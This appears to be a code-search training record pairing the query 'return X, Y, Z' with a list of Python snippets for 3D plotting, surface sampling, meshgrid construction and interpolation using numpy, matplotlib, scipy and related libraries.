return X, Y, Z | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def draw_f():\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n x_matrix = np.arange(-10, 11, 0.1)\n y_matrix = np.arange(-10, 11, 0.1)\n x_matrix, y_matrix = np.meshgrid(x_matrix, y_matrix)\n # print(x_matrix)\n u_matrix = x_matrix.copy()\n for i in range(x_matrix.shape[0]):\n for j in range(x_matrix.shape[0]):\n u_matrix[i][j] = f(x_matrix[i][j], y_matrix[i][j])\n surf = ax.plot_surface(x_matrix, y_matrix, u_matrix)\n\n plt.show()\n return surf",
"def sample2d(f, x_args):\n try:\n f = sympify(f)\n except SympifyError:\n raise ValueError(\"f could not be interpreted as a SymPy function\")\n try:\n x, x_min, x_max, x_n = x_args\n except (TypeError, IndexError):\n raise ValueError(\"x_args must be a tuple of the form (var, min, max, n)\")\n\n x_l = float(x_max - x_min)\n x_d = x_l/float(x_n)\n X = np.arange(float(x_min), float(x_max) + x_d, x_d)\n\n Y = np.empty(len(X))\n for i in range(len(X)):\n try:\n Y[i] = float(f.subs(x, X[i]))\n except TypeError:\n Y[i] = None\n return X, Y",
"def newplot3(*args, **kwargs):\n\n if 'linewidth' and 'lw' not in kwargs.keys():\n kwargs['linewidth'] = 2\n\n fig = plt.figure(figsize=FIGURE_SIZE, dpi=FIGURE_DPI)\n ax = fig.add_subplot(111, projection='3d')\n\n x = np.asarray(args[0], dtype=float)\n y = np.asarray(args[1], dtype=float)\n z = np.asarray(args[2], dtype=float)\n\n if z.ndim == 2:\n if x.ndim < 2:\n x = np.tile(x, z.shape[1]).reshape(z.T.shape).T\n if y.ndim < 2:\n y = np.tile(y, z.shape[0]).reshape(z.shape)\n\n # Plot each array independently\n for n in range(len(z)):\n ax.plot(x[n], y[n], z[n], *args[3:], **kwargs)\n else:\n ax.plot(*args, **kwargs)",
"def plot3d(data):\n assert span1 == span2\n span = span1\n # ---------------------- create the figure and axes ---------------------- #\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n # -- discretize the definition space and compute the function's images --- #\n X, Y = discretise_space([defspace1, defspace2], n=span)\n Z = data\n\n # ----------------------- appearance and plotting ------------------------ #\n ax.set_zlim(np.min(Z) - 0.5, np.max(Z) + 0.5)\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n ax.set(xlabel='$W\\_C$', ylabel='$W\\_W$', zlabel=\"Utilité\")#,\n # title='Utilité à {} ticks en fonction de W_W et W_C'.format(ticks))\n\n # Plot the surface.\n surf = ax.plot_surface(X, Y, Z, alpha=0.8, #, cmap='binary'\n linewidth=0, antialiased=False, zorder=1)\n\n plt.show()",
"def sample(f, *var_args):\n if len(var_args) == 1:\n return sample2d(f, var_args[0])\n elif len(var_args) == 2:\n return sample3d(f, var_args[0], var_args[1])\n else:\n raise ValueError(\"Only 2d and 3d sampling are supported at this time.\")",
"def plot_3d(results_list): \n x_range = range(len(results_list[0]))\n fig = plt.figure()\n axe = Axes3D(fig)\n\n for idx, result in enumerate(results_list):\n axe.plot(x_range, result, idx)\n plt.show()",
"def drawCurve3D(xlist, ylist, zlist):\n dislin.curv3d(xlist,ylist,zlist,len(xlist))",
"def plot3d(self,datarange=None,nx=100,ny=100,clf=True,cb=True,data='auto',**kwargs):\n from enthought.mayavi import mlab as M\n from operator import isMappingType\n\n if data == 'auto':\n if self.data:\n data = self.data[:2]\n else:\n data = None\n\n if data: #TODO:correct coord conv\n xd,yd = data[0][0],data[0][1]\n if datarange is None:\n datarange = (np.min(xd),np.max(xd),np.min(yd),np.max(yd))\n maxmind = (np.max(data[1]),np.min(data[1]))\n elif datarange is None:\n if self.rangehint is not None:\n datarange = self.rangehint\n else:\n raise ValueError(\"Can't choose limits for plotting without data or a range hint\")\n maxmind = None\n\n grid = np.mgrid[datarange[0]:datarange[1]:1j*nx,datarange[2]:datarange[3]:1j*ny]\n res = self(grid)\n\n# if maxmind:\n# norm = plt.normalize(min(np.min(res),maxmind[1]),max(np.max(res),maxmind[0]))\n# else:\n# norm = plt.normalize(np.min(res),np.max(res))\n\n if clf:\n M.clf()\n\n M.mesh(grid[0],grid[1],res)\n\n if cb:\n if isMappingType(cb):\n M.colorbar(**cb)\n else:\n M.colorbar()\n\n if data:\n if isMappingType(data):\n kwscat = dict(data)\n else:\n kwscat = {}\n zd = data[1]\n zres = zd-self((xd,yd))\n kwscat.setdefault('scale_mode','none')\n kwscat.setdefault('scale_factor','auto')\n g = M.points3d(xd,yd,zd,zres,**kwscat)\n if kwscat['scale_factor'] == 'auto':\n g.glyph.glyph.scale_factor /= 2\n\n #M.xlim(datarange[0],datarange[1])\n #M.ylim(datarange[2],datarange[3])",
"def axis3D(xlow,xhigh,xfirst,xstep,ylow,yhigh,yfirst,ystep,\\\n zlow,zhigh,zfirst,zstep):\n dislin.graf3d(xlow,xhigh,xfirst,xstep,ylow,yhigh,yfirst,ystep,\\\n zlow,zhigh,zfirst,zstep)",
"def surfcut_points(**kwargs):\n npoints = kwargs.get( 'npoints', 240 )\n origin = kwargs.get( 'origin', vec3(0.,0.,0.)) \n normal = kwargs.get( 'normal', (np.pi/2., 0.) ) \n lims0 = kwargs.get( 'lims0', (-50., 50.) ) \n lims1 = kwargs.get( 'lims1', (-50., 50.) ) \n extents = kwargs.get( 'extents', None) \n \n if extents is not None:\n lims0 = (-extents, extents)\n lims1 = (-extents, extents)\n \n # Make the unit vectors that define the plane\n unit = vec3()\n th = normal[0]\n ph = normal[1]\n unit.set_spherical( 1, th, ph) \n orth0 = vec3( -1.*np.sin(ph), np.cos(ph), 0. )\n orth1 = cross(unit,orth0)\n \n t0 = np.linspace( lims0[0], lims0[1], npoints )\n t1 = np.linspace( lims1[0], lims1[1], npoints ) \n \n # Obtain points on which function will be evaluated\n T0,T1 = np.meshgrid(t0,t1)\n X = origin[0] + T0*orth0[0] + T1*orth1[0] \n Y = origin[1] + T0*orth0[1] + T1*orth1[1]\n Z = origin[2] + T0*orth0[2] + T1*orth1[2] \n \n\n # If given an axes it will plot the reference surface to help visusalize\n # the surface cut\n \n # Note that the axes needs to be created with a 3d projection. \n # For example: \n # fig = plt.figure( figsize=(4.,4.) ) \n # gs = matplotlib.gridspec.GridSpec( 1,1 ) \n # ax0 = fig.add_subplot( gs[0,0], projection='3d' ) \n \n ax0 = kwargs.get( 'ax0', None ) \n if ax0 is not None: \n\n # Plot the reference surface\n ax0.plot_surface(X, Y, Z, rstride=8, cstride=8, alpha=0.3, linewidth=0.)\n ax0.set_xlabel('X')\n ax0.set_ylabel('Y')\n ax0.set_zlabel('Z')\n lmin = min([ ax0.get_xlim()[0], ax0.get_ylim()[0], ax0.get_zlim()[0] ] )\n lmax = max([ ax0.get_xlim()[1], ax0.get_ylim()[1], ax0.get_zlim()[1] ] )\n ax0.set_xlim( lmin, lmax )\n ax0.set_ylim( lmin, lmax )\n ax0.set_zlim( lmin, lmax )\n ax0.set_yticklabels([])\n ax0.set_xticklabels([])\n ax0.set_zticklabels([])\n \n # If given an axes and a potential it will plot the surface cut of the \n # potential \n\n ax1 = kwargs.get( 'ax1', None) \n pot = kwargs.get( 'potential', None) \n\n if (ax1 is not None) and (pot is not None):\n # Evaluate function at points and plot\n EVAL = pot.evalpotential(X,Y,Z)\n\n im =ax1.pcolormesh(T0, T1, EVAL, cmap = plt.get_cmap('jet')) \n # cmaps: rainbow, jet\n\n plt.axes( ax1)\n cbar = plt.colorbar(im)\n cbar.set_label(pot.unitlabel, rotation=0 )#self.unitlabel\n \n return T0, T1, X, Y, Z",
"def plot_bivariate_3d(X, Y, Z, bounds, title, **kwargs):\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.set_xticks(np.linspace(bounds[0],bounds[1],6))\n ax.set_yticks(np.linspace(bounds[0],bounds[1],6))\n ax.set_xlim(bounds)\n ax.set_ylim(bounds)\n ax.plot_surface(X,Y,Z, **kwargs)\n plt.title(title)\n plt.show()",
"def plot_results_traj_3d(p_x, p_y, p_z, xmin, xmax, ymin, ymax, zmin, zmax):\n fig, ax = plt.subplots(2 , 2, figsize = (10, 10))\n \n for p in np.arange(0, p_x.shape[0], step = 1): \n for t in np.arange(0, p_x.shape[1], step = 1): \n ax[0,0].plot(t, p_x[p, t], 'rx') \n ax[0,1].plot(t, p_y[p, t], 'gx') \n ax[1,0].plot(t, p_z[p, t], 'bx') \n ax[1,1].plot(t, p_x[p, t], 'rx') \n ax[1,1].plot(t, p_y[p, t], 'gx') \n ax[1,1].plot(t, p_z[p, t], 'bx') \n for a in ax.flat: \n a.set(xlabel = 'Time steps', ylabel = 'Position')\n ax[0,0].set_title('X (pix)') \n ax[0,0].set_ylim([xmin, xmax]) \n ax[0,1].set_title('Y (pix)') \n ax[0,1].set_ylim([ymin, ymax]) \n ax[1,0].set_title('Z (pix)') \n ax[1,0].set_ylim([zmin, zmax])\n ax[1,1].set_title('Positions combined') \n ax[1,1].set_ylim([np.array([xmin, ymin, zmin]).min(), np.array([xmax, ymax, zmax]).max()])",
"def plot_response_surface(f, p, dims=[0,1]):\n import pylab\n if len(dims) == 1:\n xi = dims[0]\n x = pylab.linspace(-10,10,40) - p[xi]\n def value(v):\n p[xi] = v\n return f(p)\n z = [value(v) for v in x]\n pylab.plot(x,z)\n else:\n xi,yi = dims\n x = pylab.linspace(-10,10,40) - p[xi]\n y = pylab.linspace(-10,10,40) - p[yi]\n def value(pt):\n p[xi] = pt[0]\n p[yi] = pt[1]\n return f(p)\n z = np.array([[value((v,w)) for v in x] for w in y])\n pylab.pcolor(x,y,z)",
"def plot_cube(ax: Axes, x: ArrayLike, y: ArrayLike, f_low: callable, f_upp: callable, **kwargs):\n # lower\n xm, ym = np.meshgrid(x, y)\n zm = f_low(xm, ym)\n ax.plot_surface(xm, ym, zm, **kwargs)\n\n # upper\n zm = f_upp(xm, ym)\n ax.plot_surface(xm, ym, zm, **kwargs)\n\n # north\n xm, ym = np.array([x, x]), y[0]*np.ones([2, len(y)])\n zm = np.array([f_low(x, y[0]), f_upp(x, y[0])])\n ax.plot_surface(xm, ym, zm, **kwargs)\n\n # south\n xm, ym = np.array([x, x]), y[-1]*np.ones([2, len(y)])\n zm = np.array([f_low(x, y[-1]), f_upp(x, y[-1])])\n ax.plot_surface(xm, ym, zm, **kwargs)\n\n # east\n xm, ym = x[0]*np.ones([2, len(x)]), np.array([y, y])\n zm = np.array([f_low(x[0], y), f_upp(x[0], y)])\n ax.plot_surface(xm, ym, zm, **kwargs)\n\n # west\n xm, ym = x[-1]*np.ones([2, len(x)]), np.array([y, y])\n zm = np.array([f_low(x[-1], y), f_upp(x[-1], y)])\n ax.plot_surface(xm, ym, zm, **kwargs)",
"def plot_mesh_function(mesh, f, title=\"\", colormap = \"hot\", edges = False, mybounds = [], myticks = []) :\n if mesh.dimension() == 1 :\n # get the mesh points\n x = mesh_axes(mesh)\n # plot the map\n plt.plot(x, f)\n \n elif mesh.dimension() == 2 :\n\n # Get the mesh axes and then make a grid of them for plotting.\n x, y = mesh_axes(mesh)\n X, Y = np.meshgrid(x, y)\n # Reshape the function\n f = f.reshape(mesh.number_cells_x(), mesh.number_cells_y())\n if edges :\n plt.pcolor(X, Y, f, cmap=colormap, edgecolors='k')\n else :\n plt.pcolor(X, Y, f, cmap=colormap)\n plt.axis(\"scaled\") \n plt.xlabel(\"x [cm]\")\n plt.ylabel(\"y [cm]\")\n if len(myticks) :\n cbar = plt.colorbar(boundaries=mybounds,ticks=myticks)\n else : \n cbar = plt.colorbar()\n else :\n print \"not ready for 3d\"\n return\n plt.title(title)\n # show the plot\n plt.show()",
"def eval_r_func_3(f, x, y, t):\n elementary_func = ['prod', 'avg', 'cos_pi', 'sin_pi']\n if f[0] == \"x\":\n return x\n elif f[0] == \"y\":\n return y\n elif f[0] == \"t\":\n return t\n else:\n if f[0] == elementary_func[0]:\n first_argument = eval_r_func_3(f[1], x, y, t)\n second_argument = eval_r_func_3(f[2], x, y, t)\n return first_argument * second_argument\n elif f[0] == elementary_func[1]:\n first_argument = eval_r_func_3(f[1], x, y, t)\n second_argument = eval_r_func_3(f[2], x, y, t)\n return .5*(first_argument + second_argument)\n elif f[0] == elementary_func[2]:\n argument = eval_r_func_3(f[1], x, y, t)\n ans = math.cos(math.pi * argument)\n return ans\n elif f[0] == elementary_func[3]:\n argument = eval_r_func_3(f[1], x, y, t)\n ans = math.sin(math.pi * argument)\n return ans",
"def __create_sample_data__(npts = 20):\n\t#data function\n\tdef wavy(x, y):\n\t\treturn np.sin(0.2*np.pi*x)*np.cos(0.4*np.pi*y)\n\t\n\t#make grid\n\txs = np.linspace(0, 2*20, 2*npts + 1)\n\tys = np.linspace(0, 20, npts + 1)\n\t(xgrid, ygrid) = np.meshgrid(xs, ys)\n\tzgrid = wavy(xgrid, ygrid)\n\t\n\treturn (xgrid, ygrid, zgrid)",
"def show_trace_2d(f, results):\n plt.close()\n # draw input points\n plt.plot(*zip(*results), '-o', color='#ff7f0e')\n # get the field of figure\n x1, x2 = np.meshgrid(np.arange(-5.5, 1.0, 0.1), np.arange(-3.0, 1.0, 0.1))\n # draw the contour of function using x1,x2 as step\n plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.show()",
"def plotSurface(X):\n from mpl_toolkits.mplot3d import Axes3D\n from mpl_toolkits.mplot3d import proj3d\n f=plt.figure()\n ax=f.add_subplot(111,projection='3d')\n xi=np.arange(10,14,0.05)\n yi=np.arange(12,16,0.05)\n z = matplotlib.mlab.griddata(X[:,0], X[:,1], X[:,2], xi, yi, interp='nn')\n x, y = np.meshgrid(xi, yi)\n ax.plot_surface(x, y, z)\n return f",
"def test_exercise_1():\n a, b = 5, 0\n fvals = []\n grid = np.linspace(-3, 4)\n for value in grid:\n fvals.append(get_test_function(value, a, b))\n plt.plot(grid, fvals)",
"def timeit_plot3D(data, xlabel='xlabel', ylabel='ylabel', **kwargs):\n dataT = {}\n figs = []\n series = kwargs.get('series', (0,1))\n cmap = kwargs.get('cmap', cm.coolwarm)\n for k, v in data.items():\n dataT[k] = zip(*v)\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n X, Y, Z = dataT[k][series[0]], dataT[k][series[1]], dataT[k][-1]\n wide, tall = (max(X)-min(X)+1), (max(Y)-min(Y)+1)\n intervalX = max(X) - min(heapq.nlargest(2,set(X)))\n intervalY = max(Y) - min(heapq.nlargest(2,set(Y)))\n wide, tall = 1+wide/intervalX, 1+tall/intervalY\n X = np.reshape(X, [wide, tall])\n Y = np.reshape(Y, [wide, tall])\n # TODO: BUG: fix so that Z transposes with x & y reversed\n Z = np.reshape(Z, [wide, tall])\n surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cmap, linewidth=0, antialiased=False)\n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.set_title(substitute_titles(k,series))\n fig.colorbar(surf, shrink=0.5, aspect=5)\n figs.append(fig)\n return figs",
"def plot_surface(\n condition: bool,\n function: typing.Callable,\n x: typing.List[float],\n t: typing.List[float],\n p: typing.List[float],\n t_min: float,\n t_max: float,\n x_v: numpy.array,\n):\n # TODO: docstring\n fig = plt.figure()\n ax = fig.add_subplot(projection=\"3d\")\n\n if condition:\n ax.scatter(x, t, p, marker=\"o\")\n\n t_v = numpy.linspace((t_min - 10), (t_max + 10), num=50)\n x_fit, t_fit = numpy.meshgrid(x_v, t_v)\n p_fit = numpy.array([function(x_fit[i], t_fit[i]) for i in range(len(x_fit))])\n ax.plot_surface(x_fit, t_fit, p_fit, alpha=0.2)\n\n ax.set_xlabel(\"First component fraction\")\n ax.set_ylabel(\"Temperature K\")\n ax.set_zlabel(\"Permeance\")\n fig.suptitle(\"Fit Illustration\", fontsize=10)\n plt.show()",
"def fcontourf(f, x1range, x2range, yrange, **kwargs):\n x1s = np.linspace(x1range[0], x1range[1])\n x2s = np.linspace(x2range[0], x2range[1])\n ys = np.linspace(yrange[0], yrange[1], 20)\n fs = [[f(np.array([x1,x2])) for x1 in x1s] for x2 in x2s]\n plt.contourf(x1s, x2s, fs, ys, **kwargs)\n plt.axis('scaled')",
"def plot(vec):\n\n # ADDITIONAL CODE, to see what the ranges are of the features\n # get a list containing all the first features and second features, respectively\n # feature_1 = list(map(lambda x: x[0], vec))\n # feature_2 = list(map(lambda x: x[1], vec))\n # x = np.arange(min(feature_1), max(feature_1), delta)\n # y = np.arange(min(feature_2), max(feature_2), delta)\n\n fig = plt.figure()\n ax = Axes3D(fig)\n\n # make a numpy arange from the minimum feature until the maximum features\n # delta is the size of spacing between samples\n delta = 0.1\n x = np.arange(-2.0, 4.0, delta)\n y = np.arange(-3.0, 4.0, delta)\n\n # make a 2-D grind\n x, y = np.meshgrid(x, y)\n\n # assign bivariate Gaussian distribution for equal shape X, Y.\n z1 = mlab.bivariate_normal(x, y, sigmax=1.0, sigmay=1.0, mux=0.0, muy=0.0)\n z2 = mlab.bivariate_normal(x, y, sigmax=1.5, sigmay=0.5, mux=1, muy=1)\n z = 10.0 * (z2 - z1)\n\n # create surface plot\n ax.plot_surface(x, y, z, cmap=cm.coolwarm, linewidth=0, antialiased=False)\n plt.savefig(\"./graphs/figures/f1_2surf3n.png\")\n\n \"\"\"\n # create contour plot\n contour_plot = plt.contour(x, y, z)\n # assign labels and title\n plt.clabel(contour_plot, inline=1, fontsize=10)\n plt.title('Feature 1 against feature 2')\n plt.savefig(\"./graphs/figures/f1_2n.png\")\n \"\"\"",
"def function_3d(point):\n return point[0]**2 + point[1]**2 + point[2]**2 - 1",
"def plot_results_3d(p_x, p_y, p_z, h_exp = 0.5):\n plt.figure(figsize = (10, 10))\n ax3d = plt.axes(projection = '3d') \n\n color=iter(cm.rainbow(np.linspace(0,1,p_x.shape[0]))) # (1)\n labels = ['Particle ' + str(pl+1) for pl in np.arange(0, p_x.shape[0], step = 1)]\n \n for p in np.arange(0, p_x.shape[0], step = 1): \n c = next(color) # (1)\n for t in np.arange(0, p_x.shape[1], step = 1): \n ax3d.plot3D(p_x[p, t], p_y[p, t], p_z[p, t], 'x', c = c, label = labels[p]) \n legend_without_duplicate_labels(ax3d)\n ax3d.set_xlabel('X (pixels)') \n ax3d.set_ylabel('Y (pixels') \n ax3d.set_zlabel('Z (pixels)') \n ax3d.set_xlim([origin-150,origin+150])\n ax3d.set_ylim([origin-150,origin+150])\n ax3d.set_zlim([origin-150,origin+150])\n ax3d.set_title('3D particle trajectories - H = ' + str(h_exp))",
"def show_trace_2d(f, results): #@save\n set_figsize()\n plt.plot(*zip(*results), '-o', color='#ff7f0e')\n x1, x2 = torch.meshgrid(torch.arange(-5.5, 1.0, 0.1),torch.arange(-3.0, 1.0, 0.1))\n plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')\n plt.xlabel('x1')",
"def apply_PSFvar3Dz(x, z, a):\n N1, N2, N3 = x.shape\n Hxz = np.zeros((N1, N2))\n\n p3 = int((a.shape[2]-1)/2)\n\n zmin = max(0,z-p3)\n zmax = min(N3,z+p3+1)\n\n for n3 in range(zmin,zmax):\n bF2 = conv2D_fourier(x[:,:,n3], a[:,:,z-n3+p3])\n Hxz = Hxz + bF2\n\n return Hxz",
"def list_plot3d_tuples(v, interpolation_type, texture, **kwds):\n from matplotlib import tri, delaunay\n import numpy\n import scipy\n from random import random\n from scipy import interpolate\n from .plot3d import plot3d\n\n if len(v)<3:\n raise ValueError(\"We need at least 3 points to perform the interpolation\")\n\n x = [float(p[0]) for p in v]\n y = [float(p[1]) for p in v]\n z = [float(p[2]) for p in v]\n\n # If the (x,y)-coordinates lie in a one-dimensional subspace, the\n # matplotlib Delaunay code segfaults. Therefore, we compute the\n # correlation of the x- and y-coordinates and add small random\n # noise to avoid the problem if needed.\n corr_matrix = numpy.corrcoef(x, y)\n if corr_matrix[0, 1] > 0.9 or corr_matrix[0, 1] < -0.9:\n ep = float(.000001)\n x = [float(p[0]) + random()*ep for p in v]\n y = [float(p[1]) + random()*ep for p in v]\n\n\n # If the list of data points has two points with the exact same\n # (x,y)-coordinate but different z-coordinates, then we sometimes\n # get segfaults. The following block checks for this and raises\n # an exception if this is the case.\n # We also remove duplicate points (which matplotlib can't handle).\n # Alternatively, the code in the if block above which adds random\n # error could be applied to perturb the points.\n drop_list = []\n nb_points = len(x)\n for i in range(nb_points):\n for j in range(i+1, nb_points):\n if x[i] == x[j] and y[i] == y[j]:\n if z[i] != z[j]:\n raise ValueError(\"Two points with same x,y coordinates and different z coordinates were given. Interpolation cannot handle this.\")\n elif z[i] == z[j]:\n drop_list.append(j)\n x = [x[i] for i in range(nb_points) if i not in drop_list]\n y = [y[i] for i in range(nb_points) if i not in drop_list]\n z = [z[i] for i in range(nb_points) if i not in drop_list]\n\n xmin = float(min(x))\n xmax = float(max(x))\n ymin = float(min(y))\n ymax = float(max(y))\n\n num_points = kwds['num_points'] if 'num_points' in kwds else int(4*numpy.sqrt(len(x)))\n #arbitrary choice - assuming more or less a nxn grid of points\n # x should have n^2 entries. We sample 4 times that many points.\n\n if interpolation_type == 'linear':\n T = tri.Triangulation(x, y)\n f = tri.LinearTriInterpolator(T, z)\n j = numpy.complex(0, 1)\n from .parametric_surface import ParametricSurface\n def g(x, y):\n z = f(x, y)\n return (x, y, z)\n G = ParametricSurface(g, (list(numpy.r_[xmin:xmax:num_points*j]), list(numpy.r_[ymin:ymax:num_points*j])), texture=texture, **kwds)\n G._set_extra_kwds(kwds)\n return G\n\n if interpolation_type == 'nn' or interpolation_type =='default':\n\n T=delaunay.Triangulation(x,y)\n f=T.nn_interpolator(z)\n f.default_value=0.0\n j=numpy.complex(0,1)\n vals=f[ymin:ymax:j*num_points,xmin:xmax:j*num_points]\n from .parametric_surface import ParametricSurface\n def g(x,y):\n i=round( (x-xmin)/(xmax-xmin)*(num_points-1) )\n j=round( (y-ymin)/(ymax-ymin)*(num_points-1) )\n z=vals[int(j),int(i)]\n return (x,y,z)\n G = ParametricSurface(g, (list(numpy.r_[xmin:xmax:num_points*j]), list(numpy.r_[ymin:ymax:num_points*j])), texture=texture, **kwds)\n G._set_extra_kwds(kwds)\n return G\n\n if interpolation_type == 'spline':\n from .plot3d import plot3d\n kx = kwds['kx'] if 'kx' in kwds else 3\n ky = kwds['ky'] if 'ky' in kwds else 3\n if 'degree' in kwds:\n kx = kwds['degree']\n ky = kwds['degree']\n s = kwds['smoothing'] if 'smoothing' in kwds else len(x)-numpy.sqrt(2*len(x))\n s = interpolate.bisplrep(x, y, z, [int(1)]*len(x), xmin, xmax, ymin, ymax, kx=kx, ky=ky, s=s)\n f = lambda x,y: interpolate.bisplev(x, y, s)\n return plot3d(f, (xmin, xmax), (ymin, ymax), texture=texture, plot_points=[num_points, num_points], **kwds)",
"def F3d_2_vtkFromat(F3d):\n #asign variables\n [Fx,Fy,Fz] = F3d\n \n #generate the output array\n F3dVTK = N.array([N.zeros(3) for i in range(len(Fx)*len(Fy[0])*len(Fz[0][0]))])\n \n #loop and rearange\n c=0\n for k in range(len(Fz)):\n for j in range(len(Fz[0])):\n for i in range(len(Fz[0][0])):\n #fariables corresponding with the point\n fxn = Fx[k][j][i]\n fyn = Fy[k][j][i]\n fzn = Fz[k][j][i]\n F3dVTK[c] = N.array([fxn,fyn,fzn])\n #update counter \n c = c+1\n \n return F3dVTK",
"def interpolate_2d(x, y, z):\n X = np.linspace(min(x), max(x))\n Y = np.linspace(min(y), max(y))\n X, Y = np.meshgrid(X, Y)\n #f = interpolate.interp2d(x, y, z)\n #Z = f(X[0, :], Y[:, 0])\n f = interpolate.LinearNDInterpolator(zip(x, y), z)\n Z = f(X, Y)\n return X, Y, Z",
"def vector3(x, y, z):\n return np.array([x, y, z], dtype=np.float)",
"def mpl_multivariate_3d_gd(\n filename: str= \"\",\n name_labels: List[str] = [],\n colors: List[str] = [],\n functions: list = [], # list of funtions\n target_function: List[np.ndarray] = [],\n cmap_target: List[str] = [],\n label_target: List[str] = [],\n fedavg_clients=None,\n fedavg_eval=None,\n fedavg_communication_rounds: List[int] = [10],\n fedavg_steps_local: List[int] = [10],\n title: str = \"\",\n hist_slice=slice(None),\n theta=START_THETA,\n):\n assert (\n len(name_labels) == len(colors) == len(functions)\n ), \"incorrect settings. for each function, specify a matplotlib color and label name\"\n\n assert (\n len(target_function) == len(cmap_target) == len(label_target)\n ), \"incorrect settings. only one target function can be plotted\"\n\n print(\n f\"create 3D plot using SGD on {list(zip(name_labels, colors))} \"\n f\"over distribution {list(zip(label_target, cmap_target))}\"\n )\n\n # 3D Settings\n fig = plt.figure()\n ax = fig.gca(projection=\"3d\")\n #ax.set_zlim(-0.15, 0.2)\n ax.set_zticks(np.linspace(0, 0.2, 5))\n\n offset_contour = -0.03\n ax.view_init(elev=20.0, azim=-125)\n ax.dist = 7.5\n\n ax.set_xlabel(r\"${\\theta}_0$\")\n ax.set_ylabel(r\"${\\theta}_1$\")\n ax.set_zlabel(r\"J(${\\theta}_0$, ${\\theta}_1$)\")\n\n # history of regular GD\n for i in range(len(name_labels)):\n history = grad_descent(functions[i], theta = theta)\n history = history[hist_slice]\n ax.plot(\n history[:, 0],\n history[:, 1],\n history[:, 2],\n label=name_labels[i],\n c=colors[i],\n lw=5,\n zorder=100,\n )\n ax.plot(\n history[:, 0],\n history[:, 1],\n np.full_like(history[:, 1], offset_contour+0.001),\n lw=2,\n c=colors[i],\n zorder=100,\n )\n\n # history of FedAvg\n if fedavg_clients is not None:\n for i in range(len(fedavg_communication_rounds)):\n hs, h_clients = fedavg(\n fedavg_clients,\n fedavg_eval,\n fedavg_communication_rounds[i],\n fedavg_steps_local[i],\n theta=theta,\n )\n hs = hs[hist_slice]\n hs = hs[hist_slice]\n ax.plot(hs[:, 0], hs[:, 1], hs[:, 2], label=\"FedAvg\", c=\"red\", lw=5, zorder=100)\n # on contour plot\n ax.plot(\n hs[:, 0],\n hs[:, 1],\n np.full_like(hs[:, 1], offset_contour+0.001),\n lw=2,\n c=\"red\",\n zorder=100,\n )\n\n print(title, hs[-1, :])\n\n # plot target function\n for i in range(len(target_function)):\n # Create a surface plot and projected filled contour plot under it.\n ax.plot_wireframe(\n X,\n Y,\n target_function[i],\n rstride=3,\n cstride=3,\n linewidth=0.5,\n antialiased=True,\n cmap=cmap_target[i],\n label=label_target[i],\n zorder=1,\n )\n ax.contourf(\n X,\n Y,\n target_function[i],\n zdir=\"z\",\n offset=offset_contour,\n cmap=cmap_target[i],\n zorder=0,\n alpha=.97,\n )\n\n ax.legend()\n if title:\n ax.set_title(title)\n if filename:\n fig.savefig(f\"{filename}.svg\")\n\n if \"mpld3\" in sys.modules:\n try:\n mpld3.save_html(fig, f\"{filename}.html\")\n except:\n pass\n # try to creat figure mpld3, but 3d plots are not supported.\n return fig",
"def generate_training_data_3D():\n c11 = np.random.uniform(0.05, 1.50, 20)\n c12 = np.random.uniform(-1.50, 1.50, 20)\n c13 = np.random.uniform(-2.50, -0.05, 20)\n c21 = np.random.uniform(-1.50, -0.05, 20)\n c22 = np.random.uniform(-1.50, 1.50, 20)\n c23 = np.random.uniform(0.05, 2.50, 20)\n c1 = np.array([[i, j, k] for i, j, k in zip(c11, c12, c13)])\n c2 = np.array([[i, j, k] for i, j, k in zip(c21, c22, c23)])\n\n points = plt.figure()\n ax = points.add_subplot(111, projection='3d')\n ax.scatter(c1[:, 0], c1[:, 1], c1[:, 2], c='r', marker='^')\n ax.scatter(c2[:, 0], c2[:, 1], c2[:, 2], c='b', marker='*')\n plt.show()\n plt.close()\n\n return c1, c2",
"def gaussian3d(center_z, center_x, center_y, height, width_z, width_x, width_y):\n width_x = float(width_x)\n width_y = float(width_y)\n width_z = float(width_z)\n return lambda z,x,y: height*np.exp(\n -(((center_z-z)/width_z)**2 + \n ((center_x-x)/width_x)**2 + \n ((center_y-y)/width_y)**2)/2)",
"def surface(func, umin=0, umax=2*np.pi, ucount=64, urepeat=1.0,\n vmin=0, vmax=2*np.pi, vcount=64, vrepeat=1.0):\n\n vtype = [('position', np.float32, 3),\n ('texcoord', np.float32, 2),\n ('normal', np.float32, 3)]\n itype = np.uint32\n\n # umin, umax, ucount = 0, 2*np.pi, 64\n # vmin, vmax, vcount = 0, 2*np.pi, 64\n\n vcount += 1\n ucount += 1\n n = vcount*ucount\n\n Un = np.repeat(np.linspace(0, 1, ucount, endpoint=True), vcount)\n Vn = np.tile (np.linspace(0, 1, vcount, endpoint=True), ucount)\n U = umin+Un*(umax-umin)\n V = vmin+Vn*(vmax-vmin)\n\n vertices = np.zeros(n, dtype=vtype)\n for i,(u,v) in enumerate(zip(U,V)):\n vertices[\"position\"][i] = func(u,v)\n\n vertices[\"texcoord\"][:,0] = Un*urepeat\n vertices[\"texcoord\"][:,1] = Vn*vrepeat\n\n indices = []\n for i in range(ucount-1):\n for j in range(vcount-1):\n indices.append(i*(vcount) + j )\n indices.append(i*(vcount) + j+1 )\n indices.append(i*(vcount) + j+vcount+1)\n indices.append(i*(vcount) + j+vcount )\n indices.append(i*(vcount) + j+vcount+1)\n indices.append(i*(vcount) + j )\n indices = np.array(indices, dtype=itype)\n vertices[\"normal\"] = normals(vertices[\"position\"],\n indices.reshape(len(indices)//3,3))\n\n return vertices.view(gloo.VertexBuffer), indices.view(gloo.IndexBuffer)",
"def vector3(x, y, z):\n return np.array([x, y, z], dtype=float)",
